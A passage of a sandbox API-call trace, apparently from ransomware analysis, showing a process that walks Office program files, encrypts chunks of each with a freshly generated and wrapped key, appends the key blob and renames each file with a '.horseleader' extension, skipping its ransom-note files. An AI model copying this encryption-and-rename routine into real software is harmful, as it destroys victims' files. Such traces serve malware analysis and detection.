nFileSizeLow=0x51d0, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="ACERECR.DLL", cAlternateFileName="")) returned 1 [0234.511] lstrcmpiW (lpString1="ACERECR.DLL", lpString2="Windows") returned -1 [0234.511] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 76 [0234.511] StrStrIW (lpFirst="ACERECR.DLL", lpSrch=".horseleader") returned 0x0 [0234.511] lstrcmpW (lpString1="ACERECR.DLL", lpString2="#Decrypt#.txt") returned 1 [0234.511] lstrcmpW (lpString1="ACERECR.DLL", lpString2="_uninstalling_.png") returned 1 [0234.511] lstrlenW (lpString=".testttjffg") returned 11 [0234.511] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL", lpSrch=".testttjffg") returned 0x0 [0234.511] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, 
pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.511] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.511] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0234.512] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 76 [0234.512] StrStrW (lpFirst="ACERECR.DLL", lpSrch=".txt") returned 0x0 [0234.512] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=20944) returned 1 [0234.512] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.524] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.524] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.524] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1d0, lpOverlapped=0x0) returned 1 [0234.550] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.550] 
WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1d0, lpOverlapped=0x0) returned 1 [0234.551] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.551] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0234.551] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0234.551] CloseHandle (hObject=0x1a4) returned 1 [0234.551] GetProcessHeap () returned 0x780000 [0234.551] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0234.552] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.horseleader") returned 88 [0234.552] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll.horseleader")) returned 1 [0234.553] GetProcessHeap () returned 0x780000 [0234.553] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0234.553] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x81925f00, ftCreationTime.dwHighDateTime=0x1caca23, ftLastAccessTime.dwLowDateTime=0xee2a83b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x81925f00, ftLastWriteTime.dwHighDateTime=0x1caca23, nFileSizeHigh=0x0, nFileSizeLow=0xd2990, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="ACEWSTR.DLL", cAlternateFileName="")) returned 1 [0234.553] lstrcmpiW (lpString1="ACEWSTR.DLL", lpString2="Windows") returned -1 [0234.553] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 76 [0234.553] StrStrIW (lpFirst="ACEWSTR.DLL", lpSrch=".horseleader") returned 0x0 [0234.553] lstrcmpW (lpString1="ACEWSTR.DLL", lpString2="#Decrypt#.txt") returned 1 [0234.553] lstrcmpW (lpString1="ACEWSTR.DLL", lpString2="_uninstalling_.png") returned 1 [0234.553] lstrlenW (lpString=".testttjffg") returned 11 [0234.553] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL", lpSrch=".testttjffg") returned 0x0 [0234.553] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.553] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.554] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0234.555] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 76 [0234.555] StrStrW 
(lpFirst="ACEWSTR.DLL", lpSrch=".txt") returned 0x0 [0234.555] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=862608) returned 1 [0234.555] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.555] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.578] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.578] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.578] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x66cc8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.578] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.950] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.950] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.950] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xcd990, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.950] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.749] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0236.749] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.749] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.750] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0236.750] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0236.750] CloseHandle (hObject=0x1a4) returned 1 [0236.750] GetProcessHeap () returned 0x780000 [0236.750] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0236.750] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL.horseleader") returned 88 [0236.750] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft 
shared\\office14\\1033\\acewstr.dll.horseleader")) returned 1 [0236.751] GetProcessHeap () returned 0x780000 [0236.751] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0236.751] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f139500, ftCreationTime.dwHighDateTime=0x1c69359, ftLastAccessTime.dwLowDateTime=0xee2ce510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7f139500, ftLastWriteTime.dwHighDateTime=0x1c69359, nFileSizeHigh=0x0, nFileSizeLow=0x19a3ff, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="ADO210.CHM", cAlternateFileName="")) returned 1 [0236.751] lstrcmpiW (lpString1="ADO210.CHM", lpString2="Windows") returned -1 [0236.752] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 75 [0236.752] StrStrIW (lpFirst="ADO210.CHM", lpSrch=".horseleader") returned 0x0 [0236.752] lstrcmpW (lpString1="ADO210.CHM", lpString2="#Decrypt#.txt") returned 1 [0236.752] lstrcmpW (lpString1="ADO210.CHM", lpString2="_uninstalling_.png") returned 1 [0236.752] lstrlenW (lpString=".testttjffg") returned 11 [0236.752] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM", lpSrch=".testttjffg") returned 0x0 [0236.752] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0236.752] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0236.752] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM" (normalized: "c:\\program files\\common files\\microsoft 
shared\\office14\\1033\\ado210.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0236.753] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 75 [0236.753] StrStrW (lpFirst="ADO210.CHM", lpSrch=".txt") returned 0x0 [0236.753] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1680383) returned 1 [0236.753] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.753] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.770] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0236.771] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.771] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xca9ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.771] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.779] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0236.779] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.779] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x1953ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.779] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.819] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0236.819] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.820] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.820] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0236.820] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0236.820] CloseHandle (hObject=0x1a4) returned 1 [0236.821] GetProcessHeap () returned 0x780000 [0236.821] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0236.821] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.horseleader") returned 87 [0236.821] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\OFFICE14\\1033\\ADO210.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm.horseleader")) returned 1 [0236.822] GetProcessHeap () returned 0x780000 [0236.822] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0236.822] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4b06d00, ftCreationTime.dwHighDateTime=0x1ca9127, ftLastAccessTime.dwLowDateTime=0xee2ce510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe4b06d00, ftLastWriteTime.dwHighDateTime=0x1ca9127, nFileSizeHigh=0x0, nFileSizeLow=0x25b50, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="ALRTINTL.DLL", cAlternateFileName="")) returned 1 [0236.823] lstrcmpiW (lpString1="ALRTINTL.DLL", lpString2="Windows") returned -1 [0236.823] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 77 [0236.823] StrStrIW (lpFirst="ALRTINTL.DLL", lpSrch=".horseleader") returned 0x0 [0236.823] lstrcmpW (lpString1="ALRTINTL.DLL", lpString2="#Decrypt#.txt") returned 1 [0236.823] lstrcmpW (lpString1="ALRTINTL.DLL", lpString2="_uninstalling_.png") returned 1 [0236.823] lstrlenW (lpString=".testttjffg") returned 11 [0236.823] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL", lpSrch=".testttjffg") returned 0x0 [0236.823] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0236.823] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, 
pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0236.823] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0236.825] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 77 [0236.825] StrStrW (lpFirst="ALRTINTL.DLL", lpSrch=".txt") returned 0x0 [0236.825] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=154448) returned 1 [0236.825] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.825] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.864] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0236.864] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.864] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x105a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.864] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.925] SetFilePointerEx 
(in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0236.925] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.926] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x20b50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.926] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.970] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0236.970] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.971] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.971] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0236.971] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0236.971] CloseHandle (hObject=0x1a4) returned 1 [0236.971] GetProcessHeap () returned 0x780000 [0236.971] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0236.971] wnsprintfW 
(in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL.horseleader") returned 89 [0236.971] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll.horseleader")) returned 1 [0236.972] GetProcessHeap () returned 0x780000 [0236.972] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0236.972] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5e15000, ftCreationTime.dwHighDateTime=0x1cbf3e5, ftLastAccessTime.dwLowDateTime=0xc24a9ec0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe5e15000, ftLastWriteTime.dwHighDateTime=0x1cbf3e5, nFileSizeHigh=0x0, nFileSizeLow=0x269380, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="MSOINTL.DLL", cAlternateFileName="")) returned 1 [0236.972] lstrcmpiW (lpString1="MSOINTL.DLL", lpString2="Windows") returned -1 [0236.972] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 76 [0236.972] StrStrIW 